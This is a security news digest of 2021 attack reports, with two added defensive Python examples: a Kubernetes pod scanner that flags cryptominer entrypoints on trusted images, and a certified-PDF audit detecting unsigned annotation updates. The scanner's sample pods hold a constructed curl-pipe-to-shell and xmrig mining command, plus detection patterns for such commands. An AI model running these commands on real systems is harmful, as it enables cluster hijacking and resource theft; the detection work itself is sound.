Cybersecurity researchers on Tuesday disclosed a new large-scale campaign targeting Kubeflow deployments to run malicious cryptocurrency mining containers. The campaign involved deploying TensorFlow pods on Kubernetes clusters, with the pods running legitimate TensorFlow images from the official Docker Hub account. However, the container images were configured to execute rogue commands that mine cryptocurrencies. Microsoft said the deployments witnessed an uptick towards the end of May. Kubeflow is an open-source machine learning platform designed to deploy machine learning workflows on Kubernetes, an orchestration service used for managing and scaling containerized workloads across a cluster of machines. The deployment, in itself, was achieved by taking advantage of Kubeflow, which exposes its UI functionality via a dashboard that is deployed in the cluster. In the attack observed by Microsoft, the adversaries used the centralized dashboard as an ingress point to create ...The Hacker News
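The tell in this campaign is the combination of a legitimate image and a replaced entrypoint, which is something a cluster operator can scan for in pod manifests. The script below is an added example, not Microsoft's or Kubeflow's code: it walks pod specs of the shape `kubectl get pods -o json` returns, flags containers whose command line matches miner heuristics (pool protocol, known miner binaries, download-and-execute pipes), and marks when that happens on an image from a trusted repository. The manifests, the trusted-image list, the IP address and the pool hostname are all constructed for the example.

```python
"""Flag pods that run a miner under the cover of a trusted image.

Added example, not Microsoft's or Kubeflow's code. The pod manifests, IP
address, pool hostname and trusted-image list below are constructed.
"""
import re
from typing import Optional

# Images this cluster allows to run as shipped (assumption for the example).
TRUSTED_IMAGE_REPOS = {"tensorflow/tensorflow", "jupyter/tensorflow-notebook"}

# Heuristics for miner behaviour in an overridden entrypoint.
MINER_PATTERNS = {
    "mining pool protocol": re.compile(r"stratum\+(tcp|ssl)://", re.I),
    "known miner binary": re.compile(r"\b(xmrig|minerd|cpuminer|ethminer|t-rex)\b", re.I),
    "download and execute": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|da)?sh\b", re.I),
}


def image_repo(image: str) -> str:
    """Reduce an image reference to its repository, e.g.
    'docker.io/tensorflow/tensorflow:latest-gpu' -> 'tensorflow/tensorflow'."""
    name = image.split("@", 1)[0]              # drop any digest
    slash, colon = name.rfind("/"), name.rfind(":")
    if colon > slash:                          # a ':' after the last '/' is a tag
        name = name[:colon]
    for prefix in ("index.docker.io/", "docker.io/"):
        if name.startswith(prefix):
            name = name[len(prefix):]
    if "/" not in name:                        # Docker Hub official image: 'nginx' -> 'library/nginx'
        name = "library/" + name
    return name


def inspect_container(container: dict) -> Optional[dict]:
    """Return a finding for a container whose command line matches a miner heuristic."""
    command = container.get("command") or []
    args = container.get("args") or []
    cmdline = " ".join(command + args)
    reasons = [label for label, pat in MINER_PATTERNS.items() if pat.search(cmdline)]
    if not reasons:
        return None
    repo = image_repo(container.get("image", ""))
    return {
        "container": container.get("name"),
        "image": container.get("image"),
        "reasons": reasons,
        # The campaign's signature: a trusted image whose entrypoint was replaced.
        "trusted_image_repurposed": repo in TRUSTED_IMAGE_REPOS and bool(command or args),
    }


def scan_pods(pods: list) -> list:
    """Collect findings over pod manifests, including init containers."""
    findings = []
    for pod in pods:
        meta = pod.get("metadata", {})
        spec = pod.get("spec", {})
        for container in spec.get("containers", []) + spec.get("initContainers", []):
            hit = inspect_container(container)
            if hit:
                hit["pod"] = f"{meta.get('namespace', 'default')}/{meta.get('name')}"
                findings.append(hit)
    return findings


# Constructed manifests (only the fields the scanner reads).
SAMPLE_PODS = [
    {   # legitimate notebook: trusted image, no entrypoint override
        "metadata": {"namespace": "kubeflow-user", "name": "notebook-0"},
        "spec": {"containers": [{"name": "notebook", "image": "jupyter/tensorflow-notebook:latest"}]},
    },
    {   # the pattern above: official image, entrypoint replaced by a fetch-and-mine one-liner
        "metadata": {"namespace": "kubeflow", "name": "tf-job-worker-0"},
        "spec": {"containers": [{
            "name": "tensorflow",
            "image": "docker.io/tensorflow/tensorflow:latest-gpu",
            "command": ["/bin/sh", "-c"],
            "args": ["curl -s http://198.51.100.7/setup.sh | sh; ./xmrig -o stratum+tcp://pool.example.net:3333"],
        }]},
    },
    {   # miner in a custom image: still a finding, but not the trusted-image pattern
        "metadata": {"namespace": "default", "name": "bench"},
        "spec": {"containers": [{
            "name": "bench",
            "image": "registry.example.com:5000/lab/bench:1.0",
            "args": ["xmrig", "--url", "stratum+ssl://pool.example.net:443"],
        }]},
    },
]

if __name__ == "__main__":
    for finding in scan_pods(SAMPLE_PODS):
        print(finding)
```

The heuristics are deliberately narrow so they can run in an admission webhook or a periodic audit without drowning operators in noise; the `trusted_image_repurposed` flag is the one to page on, since a legitimate image with a foreign entrypoint is rarely something a data scientist did on purpose.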
June 9, 2021
Hackers hit Spain’s Ministry of Labor and Social Economy Full Text
Abstract
The Spanish Ministry of Labor and Social Economy (MITES) was hit by a cyberattack on Wednesday and is working to restore impacted services...Security Affairs
June 09, 2021
Spain’s Ministry of Labor and Social Economy hit by cyberattack Full Text
Abstract
The Spanish Ministry of Labor and Social Economy (MITES) is working on restoring services after being hit by a cyberattack on Wednesday.BleepingComputer
June 9, 2021
Memory and Storage Manufacturer ADATA Struck by Ragnar Locker Ransomware Attack Full Text
Abstract
Leading Taiwan-based memory and storage manufacturer ADATA was forced to take its systems offline after it was targeted by a ransomware attack in late May, the company has admitted.Tech Radar
June 9, 2021
Security researcher says attacks on Russian government have Chinese fingerprints – and typos, too Full Text
Abstract
An advanced persistent threat that Russia found inside government systems was too crude to have been the work of a Western nation, says security researcher Juan Andrés Guerrero-Saade.The Register
June 8, 2021
Cyber-attack on NYC Law Department Full Text
Abstract
FBI is investigating unauthorized access into New York City Law Department’s IT systemInfosecurity Magazine
June 8, 2021
Illinois County Stricken with Grief Full Text
Abstract
Grief ransomware gang claims to have stolen 2.5GB of personal data from St. ClairInfosecurity Magazine
June 8, 2021
Military Vehicles Maker Navistar Reports Data-Theft Cyberattack Full Text
Abstract
In a Form 8-K filing with the Securities and Exchange Commission (SEC), Navistar said it learned of a credible potential cybersecurity threat to its information technology system on May 20, 2021.Security Week
June 07, 2021
US recovers most of Colonial Pipeline’s $4.4M ransomware payment Full Text
Abstract
The US Department of Justice has recovered the majority of the $4.4 million ransom payment paid by Colonial Pipeline to the DarkSide ransomware operation.BleepingComputer
June 7, 2021
California City Hid Cyber-attack Full Text
Abstract
Azusa kept quiet about ransomware attack that netted cyber-criminals $65KInfosecurity Magazine
June 7, 2021
Colonial Pipeline Incident Sparks ‘Help Desk’ Phishing Attacks Full Text
Abstract
Cyberattackers are now using the notoriety of the Colonial Pipeline ransomware attack to wage further phishing campaignsInfosecurity Magazine
June 5, 2021
German cooperative banks hit by DDoS hack attack on IT provider Full Text
Abstract
A German company that operates technology for the nation’s cooperative banks said on Friday that a cyber attack disrupting more than 800 financial institutions appeared to be easing.Reuters
June 03, 2021
UF Health Florida hospitals back to pen and paper after cyberattack Full Text
Abstract
UF Health Central Florida has suffered a reported ransomware attack that forced two hospitals to shut down portions of their IT network.BleepingComputer
June 3, 2021
Museum Website Vandalized with X-Rated Ads Full Text
Abstract
Cyber-criminals take over Scottish tourism site and flood it with pornographic adwareInfosecurity Magazine
June 3, 2021
Half-Double - A New Variant of Rowhammer Attack Full Text
Abstract
Google researchers detail Half-Double, another Rowhammer attack technique, that could help criminals bypass current defenses and steal or manipulate data stored in memory. This recent study on the new Rowhammer bug variant is expected to help both researchers and industry partners to work toge ...Cyware Alerts - Hacker News
June 03, 2021
Chinese threat actors hacked NYC MTA using Pulse Secure zero-day Full Text
Abstract
Chinese-backed threat actors breached New York City's Metropolitan Transportation Authority (MTA) network in April using a Pulse Secure zero-day. Still, they failed to cause any data loss or gain access to systems controlling the transportation fleet.BleepingComputer
June 03, 2021
Massachusetts’ largest ferry service hit by ransomware attack Full Text
Abstract
The Steamship Authority, Massachusetts' largest ferry service, was hit by a ransomware attack that led to ticketing and reservation disruptions.BleepingComputer
June 2, 2021
Massachusetts Steamship Authority hit by ransomware attack Full Text
Abstract
The Steamship Authority said a team of IT professionals was assessing the impact of the attack. "Additional information will be provided upon completion of the initial assessment," the company said.WCVB
June 01, 2021
All JBS beef plants in US forced to halt production after cyberattack Full Text
Abstract
All JBS beef plants in the U.S. were forced to shut down production following a cyberattack on the meat producer over the weekend, a union representing workers at the facilities said Tuesday.The Hill
June 01, 2021
US: World’s largest beef producer JBS was hit by ransomware Full Text
Abstract
White House has confirmed today that JBS, the world's largest beef producer, was hit by a ransomware attack over the weekend coordinated by a group likely from Russia.BleepingComputer
June 01, 2021
Major meat producer JBS USA hit by cyberattack Full Text
Abstract
One of the largest meat suppliers in the country was hit on Sunday by a cyberattack that impacted operations, with the attack coming just weeks after Colonial Pipeline was forced to temporarily shut down operations due to a similar attack.The Hill
May 31, 2021
Swedish Health Agency discloses hacking attempts Full Text
Abstract
The Swedish Public Health Agency shut down the country's infectious diseases database, SmiNet, last week after multiple hacking attempts...Security Affairs
May 31, 2021
Swedish Health Agency shuts down SmiNet after hacking attempts Full Text
Abstract
The Swedish Public Health Agency has shut down SmiNet, the country's infectious diseases database, on Thursday after it was targeted in several hacking attempts.BleepingComputer
May 31, 2021
How Ransomware Adversaries Reacted to the DarkSide Attack Full Text
Abstract
CrowdStrike researchers attribute the operation of the DarkSide RaaS to CARBON SPIDER, a skilled eCrime group that is highly likely based in Eastern Europe or Russia.Crowdstrike
May 31, 2021
DeepSloth: An Adversarial Attack on Machine Learning Systems Full Text
Abstract
Scientists working at the University of Maryland developed a new adversarial attack that can force machine learning systems to slow down and cause critical failures. Although the technique has not yet caused harm in practice, more such slowdown attacks may be discovered in the future.Cyware Alerts - Hacker News
May 30, 2021
These 2 attacks allow altering certified PDF documents Full Text
Abstract
Researchers disclosed two new attack techniques that allow modifying the visible content of certified PDF documents without invalidating the digital signature. The researchers, from Ruhr-University Bochum, dubbed the techniques Evil...Security Affairs
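One check a verifier can add for the document class described above, as an added example that is not the researchers' tooling: a PDF signature covers exactly the byte ranges listed in its /ByteRange array, so any bytes that follow the last covered range are an incremental update the certifier never signed. The code builds a constructed minimal certified PDF (the CMS signature value is a zero placeholder and the cross-reference tables are omitted, since the audit does not read them), appends a FreeText annotation update of the kind an annotation-based attack relies on, and reports which object types the update introduced. Whether such an update is permitted depends on the DocMDP permission level the certifier set, so the result is a review flag rather than proof of tampering.

```python
"""Audit a certified PDF for content appended after the certifying signature.

Added example, not the researchers' tooling. A signature covers exactly the
byte ranges in its /ByteRange; anything past the end of the last covered range
is an incremental update the certifier never signed. Whether that is allowed
depends on the /DocMDP permission level (P 1 forbids all changes), so the
output is a review flag. The sample PDF is constructed: the CMS signature value
is a zero placeholder and cross-reference tables are omitted.
"""
import re
from typing import Optional

BYTERANGE_RE = re.compile(rb"/ByteRange\s*\[\s*(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s*\]")
TYPE_RE = re.compile(rb"/Type\s*/(\w+)")
SUBTYPE_RE = re.compile(rb"/Subtype\s*/(\w+)")
# Object types whose addition or redefinition can change what a reader displays.
VISIBLE_TYPES = {"Annot", "Page", "Pages", "XObject", "Font"}


def signed_region_end(pdf: bytes) -> Optional[int]:
    """Offset one past the last byte covered by the LAST /ByteRange in the file
    (the most recent signature), or None when there is no signature at all."""
    last = None
    for last in BYTERANGE_RE.finditer(pdf):
        pass
    if last is None:
        return None
    start1, len1, start2, len2 = (int(x) for x in last.groups())
    return max(start1 + len1, start2 + len2)


def audit_certified_pdf(pdf: bytes) -> dict:
    """Report what, if anything, follows the signed bytes."""
    end = signed_region_end(pdf)
    if end is None:
        raise ValueError("no signature /ByteRange found")
    tail = pdf[end:]
    types = sorted({t.decode() for t in TYPE_RE.findall(tail)})
    subtypes = sorted({t.decode() for t in SUBTYPE_RE.findall(tail)})
    return {
        "bytes_after_signature": len(tail),
        "incremental_update": b"%%EOF" in tail,       # a further revision was appended
        "added_types": types,
        "added_subtypes": subtypes,
        "visible_content_risk": bool(VISIBLE_TYPES.intersection(types)),
        "additional_signature": "Sig" in types,       # a later signature object was appended
    }


def build_certified_pdf(update: bytes = b"") -> bytes:
    """Minimal certified PDF: one signature field whose /ByteRange covers the whole
    signed revision except the /Contents hex string. Offsets are zero-padded to ten
    digits (the usual fixed-width convention) so filling them in does not move
    anything. 'update' is appended verbatim as a later, unsigned revision."""
    contents_hex = b"00" * 64      # placeholder for the DER-encoded CMS signature
    head_tpl = (
        b"%%PDF-1.7\n"
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [4 0 R] /SigFlags 3 >>"
        b" /Perms << /DocMDP 5 0 R >> >>\nendobj\n"
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >>\nendobj\n"
        b"4 0 obj\n<< /Type /Annot /Subtype /Widget /FT /Sig /T (Certifier) /Rect [0 0 0 0]"
        b" /P 3 0 R /V 5 0 R >>\nendobj\n"
        b"5 0 obj\n<< /Type /Sig /Filter /Adobe.PPKLite /SubFilter /adbe.pkcs7.detached"
        b" /Reference [<< /Type /SigRef /TransformMethod /DocMDP"
        b" /TransformParams << /Type /TransformParams /P 1 /V /1.2 >> >>]"
        b" /ByteRange [%010d %010d %010d %010d] /Contents <"
    )
    tail = b"> >>\nendobj\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n"
    head_len = len(head_tpl % (0, 0, 0, 0))       # fixed width: same length for any values
    second_start = head_len + len(contents_hex)
    head = head_tpl % (0, head_len, second_start, len(tail))
    return head + contents_hex + tail + update


# Constructed incremental update: a FreeText annotation laid over the page plus a
# redefined page object that references it. Nothing here is covered by the signature.
EVIL_ANNOTATION_UPDATE = (
    b"6 0 obj\n<< /Type /Annot /Subtype /FreeText /Rect [72 640 540 700]"
    b" /DA (/Helv 14 Tf 0 g) /Contents (Amount due: 10,000 EUR) /P 3 0 R >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R 6 0 R] >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R /Prev 0 >>\n%%EOF\n"
)

if __name__ == "__main__":
    print(audit_certified_pdf(build_certified_pdf()))
    print(audit_certified_pdf(build_certified_pdf(EVIL_ANNOTATION_UPDATE)))
```

The cryptographic verification of the signature itself still passes for the tampered file, which is the whole point of the research: the signed bytes are untouched. A viewer that only reports "signature valid" is therefore not enough; it must also evaluate everything after the covered range against the certifier's declared permissions, and a FreeText annotation or redefined page object in that tail is exactly the sort of change to refuse.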
May 28, 2021
Myths versus reality: Three takeaways from the Colonial Pipeline attack Full Text
Abstract
Some saw Colonial Pipeline as a typical ransomware attack, albeit on a vulnerable target. Others saw this as reflective of weaknesses in the security posture of the nation’s critical infrastructure. And others felt the incident showcased inadequacies in the existing framework for public-private partnership. Here we offer a rundown of some notable characteristics and outcomes.SCMagazine
May 28, 2021
SolarWinds attackers leveraged trust in Constant Contact email marketing, USAID, to launch campaign Full Text
Abstract
Using a hijacked Constant Contact email marketing account of USAID, the adversaries sent phishing emails to roughly 3,000 accounts at more than 150 different organizations. About 25 percent of these targets were international development, humanitarian and human rights organizations.SCMagazine
May 28, 2021
Canada Post disclosed a ransomware attack on a third-party service provider Full Text
Abstract
Canada Post disclosed a ransomware attack on a third-party service provider that exposed shipping information for its customers...Security Affairs
May 27, 2021
Is the attack on Fujitsu’s ProjectWEB SaaS platform the next big supply chain attack? Full Text
Abstract
While it is still early, some researchers view the reported hacking of Fujitsu's ProjectWEB software-as-a-service (SaaS) platform as a nation-state attack not unlike the one that targeted the SolarWinds supply chain.SCMagazine
May 27, 2021
New BazaFlix attack pushes BazarLoader malware via fake movie site Full Text
Abstract
Security researchers found a new BazarCall email phishing campaign that manages to bypass automated threat detection systems to deliver the BazarLoader malware used by the TrickBot gang.BleepingComputer
May 27, 2021
QNAP Devices Bombarded by Cyberattacks Full Text
Abstract
Attacks on devices from Taiwan-based QNAP continue to turn ugly. The vendor is now advising customers to update the HBS 3 disaster recovery app to block Qlocker ransomware actors, who exploit a hard-coded credentials vulnerability that functions as a backdoor.Cyware Alerts - Hacker News
May 27, 2021
How Florida water attack investigators avoided an embarrassing misattribution Full Text
Abstract
Dragos limited initial disclosure to only relevant parties, after discovering a watering-hole malware attack that later turned out to be unrelated.SCMagazine
May 27, 2021
Fake Human Rights Organization, UN Branding Used by Chinese Threat Actor to Target Uyghurs in Ongoing Cyberattacks Full Text
Abstract
Potential victims are sent phishing documents branded with the UNHRC logo. Named UgyhurApplicationList.docx, this document contains decoy material relating to discussions of human rights violations.ZDNet
May 27, 2021
Canada Post Among 44 Organizations Linked to 950,000 Customers Impacted by Malware Attack at Crown Corporation Full Text
Abstract
A malware attack on Crown Corporation has caused a data breach affecting 44 of the company’s large business clients and their 950,000 receiving customers, the postal agency confirmed Wednesday.Global News
May 26, 2021
Google discovered a new variant of Rowhammer attack dubbed Half-Double Full Text
Abstract
Google researchers discovered a new variant of the Rowhammer attack against DRAM, dubbed "Half-Double," that allows bypassing all current defenses. In...Security Affairs
May 26, 2021
Belgium Interior Ministry said it was hit by a sophisticated cyber attack Full Text
Abstract
The Belgian interior ministry was hit by a "sophisticated" cyber-espionage attack, a spokesman told RTBF public television on Tuesday...Security Affairs
May 26, 2021
Bose Reveals Ransomware Attack Impacting Staff Full Text
Abstract
Threat actors accessed sensitive personal informationInfosecurity Magazine
May 25, 2021
Threat Actor ‘Agrius’ Emerges to Launch Wiper Attacks Against Israeli Targets Full Text
Abstract
The group is using ransomware intended to make its espionage and destruction efforts appear financially motivated.Threatpost
May 25, 2021
Codecov Supply Chain Attack Still Haunts Organizations Full Text
Abstract
Does the Codecov supply chain attack have echoes of SolarWinds? More victims surface with time in yet another months-long ripple effect of a supply chain attack. Users of Codecov are advised to perform a thorough review of their CI/CD pipelines and to rotate the credentials, tokens, and keys those pipelines could access.Cyware Alerts - Hacker News
May 25, 2021
TeamTNT Targets Kubernetes Clusters and Infiltrates Nearly 50,000 IPs in Worm-like Attack Full Text
Abstract
Most of the compromised nodes were from China and the United States — identified in the ISP list, which had Chinese and US-based providers as the highest hits, including some CSPs.Trend Micro
May 25, 2021
Hacking Attack on Japanese Dating App Omiai Puts 1.71 Million Users at Risk Full Text
Abstract
Japanese dating app operator Net Marketing Co. said Friday personal data of 1.71 million users, including names and face photos, was likely leaked due to unauthorized access to its server.The Japan Times
May 25, 2021
Audio equipment maker Bose Corporation discloses a ransomware attack Full Text
Abstract
The audio equipment manufacturer Bose Corporation announced that it was the victim of a ransomware attack that took place earlier this year, on March 7...Security Affairs
May 25, 2021
Ransomware Hit: Tulsa Promises Recovery, Not Ransom Paying Full Text
Abstract
Restoration work is continuing. "All of our computer systems - with a few exceptions - are down right now," Michael Derringer, the city's CIO, said at a press conference on Thursday.Info Risk Today
May 24, 2021
Researchers Link CryptoCore Attacks On Cryptocurrency Exchanges to North Korea Full Text
Abstract
State-sponsored hackers affiliated with North Korea have been behind a slew of attacks on cryptocurrency exchanges over the past three years, new evidence has revealed. Attributing the attack with "medium-high" likelihood to the Lazarus Group (aka APT38 or Hidden Cobra), researchers from Israeli cybersecurity firm ClearSky said the campaign, dubbed "CryptoCore," targeted crypto exchanges in Israel, Japan, Europe, and the U.S., resulting in the theft of millions of dollars worth of virtual currencies. The findings are a consequence of piecing together artifacts from a series of isolated but similar reports detailed by F-Secure, Japanese CERT JPCERT/CC, and NTT Security over the past few months. Since emerging on the scene in 2009, Hidden Cobra actors have used their offensive cyber capabilities to carry out espionage and cryptocurrency heists against businesses and critical infrastructure. The adversary's targeting aligns with North Korean ...The Hacker News
May 24, 2021
FBI identifies 16 Conti ransomware attacks on US health care and first responder networks Full Text
Abstract
According to the FBI, these health care and first responder networks are among the more than 400 organizations worldwide victimized by Conti – and over 290 are located in the U.S.SCMagazine
May 24, 2021
Application Attacks Witnessed a Surge with Remote Working Full Text
Abstract
As per the NTT 2021 Global Threat Intelligence Report, web application and application-specific attacks accounted for 67% of attacks in 2020. The data was collected from January 1, 2020, to December 30, 2020.Cyware Alerts - Hacker News
May 23, 2021
Colonial Pipeline attack shows Canada must get serious about cybersecurity Full Text
Abstract
Ransomware attacks in Canada cost hundreds of millions of dollars in 2020 alone, with more than 4,000 attacks on our soil. In 2019, the official total was $2.3 billion, which is considered an extremely conservative estimate.National Post
May 21, 2021
Insurance Firm CNA Financial Reportedly Paid Hackers $40 Million in Ransom Full Text
Abstract
U.S. insurance giant CNA Financial reportedly paid $40 million to a ransomware gang to recover access to its systems following an attack in March, making it one of the most expensive ransoms paid to date. The development was first reported by Bloomberg, citing "people with knowledge of the attack." The adversary that staged the intrusion is said to have demanded $60 million a week after the Chicago-based company began negotiations with the hackers, culminating in the payment two weeks following the theft of company data. In a statement shared on May 12, CNA Financial said it had "no evidence to indicate that external customers were potentially at risk of infection due to the incident." The attack has been attributed to new ransomware known as 'Phoenix CryptoLocker,' according to a March report from Bleeping Computer, with the strain believed to be an offshoot of WastedLocker and Hades, both of which have been utilized by Evil Corp ...The Hacker News
May 21, 2021
Attackers Actively Striking with Cobalt Strike Full Text
Abstract
Researchers report that the Cobalt Strike penetration testing kit, along with the Metasploit framework, was abused to run over 25% of the malicious C2 servers deployed in 2020. Do you have a prepared strategy to protect your organization from this threat?Cyware Alerts - Hacker News
May 21, 2021
UK Insurance Firm One Call Targeted by Darkside Ransomware Gang Full Text
Abstract
The attack on the Doncaster-based insurance company was just a few days after the Colonial Pipeline's initial compromise on May 7 and one day before the ransomware gang claimed to be shutting up shop.The Register
May 21, 2021
Two Toyota Subsidiaries Across Europe and the US Hit by Ransomware Attacks Full Text
Abstract
The European operations of its subsidiary Daihatsu Diesel Company were hit by an attack, while the Toyota subsidiary Auto Parts Manufacturing Mississippi also revealed a ransomware attack.The Register
May 21, 2021
CNA Financial Paid $40 Million in Ransom After March Cyberattack Full Text
Abstract
CNA Financial, one of the largest U.S. insurance companies, paid $40 million in late March to regain control of its network after a ransomware attack, according to people familiar with the matter.Bloomberg
May 21, 2021
#RSAC: The Most Dangerous New Attack Techniques Full Text
Abstract
Annual panel at the RSA Conference identifies a number of areas of concern, including improper session handling and an evolution of ransomwareInfosecurity Magazine
May 20, 2021
Watering Hole Attack Was Used to Target Florida Water Utilities Full Text
Abstract
An investigation undertaken in the aftermath of the Oldsmar water plant hack earlier this year has revealed that an infrastructure contractor in the U.S. state of Florida hosted malicious code on its website in what's known as a watering hole attack. "This malicious code seemingly targeted water utilities, particularly in Florida, and more importantly, was visited by a browser from the city of Oldsmar on the same day of the poisoning event," Dragos researcher Kent Backman said in a write-up published on Tuesday. The site, which belongs to a Florida-based general contractor involved in building water and wastewater treatment facilities, had no bearing on the intrusion, the American industrial cybersecurity firm said. Watering hole attacks typically allow an adversary to compromise a specific group of end-users by compromising a carefully selected website, which members of that group are known to visit, with an intention to gain access to the victim's system ...The Hacker News
May 19, 2021
#RSAC: SolarWinds CEO Provides New Details into Attack and Response Full Text
Abstract
Sudhakar Ramakrishna gives details of investigations into the supply chain attackInfosecurity Magazine
May 19, 2021
Trailer maker Utility targeted in ransomware attack Full Text
Abstract
Utility Trailer Manufacturing, one of the largest U.S. producers of trailers for the trucking industry, was targeted in a ransomware attack that exposed personal information of numerous employees.Freight Waves
May 18, 2021
Colonial Pipeline servers experiencing ‘intermittent disruptions’ days after ransomware attack Full Text
Abstract
Colonial Pipeline announced Tuesday that its internal servers were experiencing “intermittent disruptions," but stressed the problem was separate from the devastating ransomware attack that disrupted operations earlier this month.The Hill
May 18, 2021
‘Flattered’ Russian spy chief denies SolarWinds attack Full Text
Abstract
The United States and Britain have blamed Russia’s Foreign Intelligence Service (SVR), for the hack which compromised nine U.S. federal agencies and hundreds of private sector companies.Reuters
May 18, 2021
70 European and South American Banks Under Attack By Bizarro Banking Malware Full Text
Abstract
A financially motivated cybercrime gang has unleashed a previously undocumented banking trojan, which can steal credentials from customers of 70 banks located in various European and South American countries. Dubbed " Bizarro " by Kaspersky researchers, the Windows malware is "using affiliates or recruiting money mules to operationalize their attacks, cashing out or simply to helping [sic] with transfers." The campaign consists of multiple moving parts, chief among them being the ability to trick users into entering two-factor authentication codes in fake pop-up windows that are then sent to the attackers, as well as its reliance on social engineering lures to convince visitors of banking websites into downloading a malicious smartphone app. Bizarro, which uses compromised WordPress, Amazon, and Azure servers to host the malware, is distributed via MSI packages downloaded by victims from sketchy links in spam emails. Launching the package downloads a ZIP archivThe Hacker News
May 17, 2021
AXA insurance subsidiary group hit by ransomware attack in multiple Asian countries Full Text
Abstract
A subsidiary group of French insurance giant AXA was hit by a ransomware attack last week that negatively impacted operations in multiple Asian countries.The Hill
May 17, 2021
FragAttacks: Affecting Millions of Wi-Fi Enabled Devices Full Text
Abstract
A total of 12 flaws, three design weaknesses in the IEEE 802.11 standard itself and nine implementation bugs in specific products, leave virtually every Wi-Fi device vulnerable. An attacker within radio range of the target can exploit them.Cyware Alerts - Hacker News
May 17, 2021
Bizarro Banking Trojan Expands its Attacks to 70 Banks From European and South American Countries Full Text
Abstract
Bizarro has x64 modules and is able to trick users into entering two-factor authentication codes in fake pop-ups. It may also use social engineering to convince victims to download a smartphone app.Kaspersky Labs
May 14, 2021
Toshiba unit hacked by DarkSide, conglomerate to undergo strategic review Full Text
Abstract
Toshiba Tec Corp, which makes products such as bar code printers and is valued at $2.3 billion, was hacked by DarkSide - the group behind the Colonial Pipeline attack, its French subsidiary said.Reuters
May 14, 2021
Rapid7 says source code, credentials accessed as a result of Codecov supply-chain attack Full Text
Abstract
Rapid7 disclosed that an unauthorized third party had access to a subset of its source code and some customer data as a result of the Codecov supply-chain attack.Security Affairs
May 13, 2021
Organizations in aerospace and travel sectors under attack, Microsoft warns Full Text
Abstract
Microsoft warns of a malware-based campaign that has targeted organizations in the aerospace and travel sectors over the past months.Security Affairs
May 12, 2021
Colonial Pipeline restarting operations after cyberattack Full Text
Abstract
Colonial Pipeline announced Wednesday that it has begun a restart of its operations after a cyberattack forced the company to shut down late last week, leading to gas shortages on the East Coast.The Hill
May 10, 2021
5 takeaways from attack on Colonial Pipeline Full Text
Abstract
The Colonial Pipeline, which transports about 45 percent of fuel consumed on the East Coast, shut down over the weekend due to a ransomware attack.The Hill
May 10, 2021
University Cancels Exams After Cyber-Attack Full Text
Abstract
America’s oldest technological research university cancels finals following cyber-intrusionInfosecurity Magazine
May 07, 2021
Microsoft: Business email compromise attack targeted dozens of orgs Full Text
Abstract
Microsoft detected a large-scale business email compromise (BEC) campaign that targeted more than 120 organizations using typo-squatted domains registered only days before the attacks began.BleepingComputer
May 7, 2021
Possible attacks on the TCP/IP protocol stack and countermeasures Full Text
Abstract
Let’s look at what types of threats each layer of the TCP/IP protocol stack may be susceptible to. The task of a computer security system is to safeguard the information transmitted over the network and to adequately preserve the data stored in it. Excluding...Security Affairs
May 6, 2021
Windows Moriya rootkit used in highly targeted attacks Full Text
Abstract
Experts spotted a new Windows rootkit, dubbed Moriya, deployed by an as-yet-unattributed threat actor in a cyberespionage campaign tracked as TunnelSnake.Security Affairs
May 5, 2021
Cyber-Attack on Belgian Parliament Full Text
Abstract
Belgium’s parliament, universities, and police targeted in a coordinated DDoS attackInfosecurity Magazine
May 4, 2021
Telstra service provider hit by cyber attack as hackers claim SIM card information stolen Full Text
Abstract
The victim, Melbourne-based Schepisi Communications, is a partner of Telstra that supplies phone numbers and cloud storage services on behalf of the telecommunications giant.News.com.au
May 04, 2021
Twilio discloses impact from Codecov supply-chain attack Full Text
Abstract
Cloud communications company Twilio has now disclosed that the recent Codecov supply-chain attack exposed a small number of Twilio's customer email addresses.BleepingComputer
May 4, 2021
Virgin Active SA Suffers Cyber-Attack Full Text
Abstract
Virgin Active South Africa takes systems offline following cyber-attackInfosecurity Magazine
May 3, 2021
New Attacks Slaughter All Spectre Defenses Full Text
Abstract
The 3+ years computer scientists spent devising defenses against these speculative-execution attacks on chip architecture? It's bound for the dustbin.Threatpost
April 29, 2021
SaaS Attacks: Lessons from Real-Life Misconfiguration Exploits Full Text
Abstract
There is a way to protect users from deceptive OAuth apps, misconfigurations and misappropriated user permissions. SaaS Security Posture Management (SSPM) takes an automated approach to tracking, and even remediating, the exploitable misconfigurations in organizations’ SaaS apps.Threatpost
April 28, 2021
Fourth time’s a charm - OGUsers hacking forum hacked again Full Text
Abstract
Popular hacking forum OGUsers has been hacked for its fourth time in two years, with hackers now selling the site's database containing user records and private messages.BleepingComputer
April 27, 2021
Ransomware Attack Forces Students Into Remote Learning at Guilderland Central School District Full Text
Abstract
The Guilderland Central School District near Albany was hit by a ransomware attack that forced students in grades 7 through 12 into all-remote learning on Monday, as confirmed by district officials.Security Affairs
April 26, 2021
Cyber-attack on NBA Team Full Text
Abstract
Investigation launched into cyber-attack on Houston RocketsInfosecurity Magazine
April 26, 2021
A supply chain attack compromised the update mechanism of Passwordstate Password Manager Full Text
Abstract
The Australian software company Click Studios was the victim of a supply chain attack in which hackers compromised the update mechanism of its Passwordstate password management application.Security Affairs
April 23, 2021
Passwordstate password manager hacked in supply chain attack Full Text
Abstract
Click Studios, the company behind the Passwordstate password manager, notified customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks.BleepingComputer
April 23, 2021
Researchers say enterprise password manager hit in supply chain attack Full Text
Abstract
In an April 23 blog, the firm said it has digital evidence that the Australian company Click Studios suffered a breach sometime between April 20 and April 22, which resulted in the attacker pushing a malicious update to its Passwordstate password manager via a zip file containing a dynamic link library with malicious code.SCMagazine
April 23, 2021
Evil Maid Attack – Vacuum Hack Full Text
Abstract
Evil Maid Attack - Weaponizing a harmless vacuum cleaner by hiding a small rogue device, such as a Raspberry Pi, inside it. It is a typical day at the office. You are sitting at your desk, working hard at whatever it is that you do. The cleaning lady...Security Affairs
April 21, 2021
Black Kingdom and Microsoft Exchange Attacks Full Text
Abstract
